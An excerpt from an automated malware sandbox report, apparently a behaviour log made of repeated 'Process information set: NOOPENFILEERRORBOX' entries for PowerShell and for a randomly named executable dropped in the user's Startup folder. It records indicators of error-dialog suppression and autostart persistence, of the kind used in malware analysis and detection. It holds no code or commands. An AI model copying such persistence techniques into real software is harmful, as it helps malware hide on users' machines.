                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
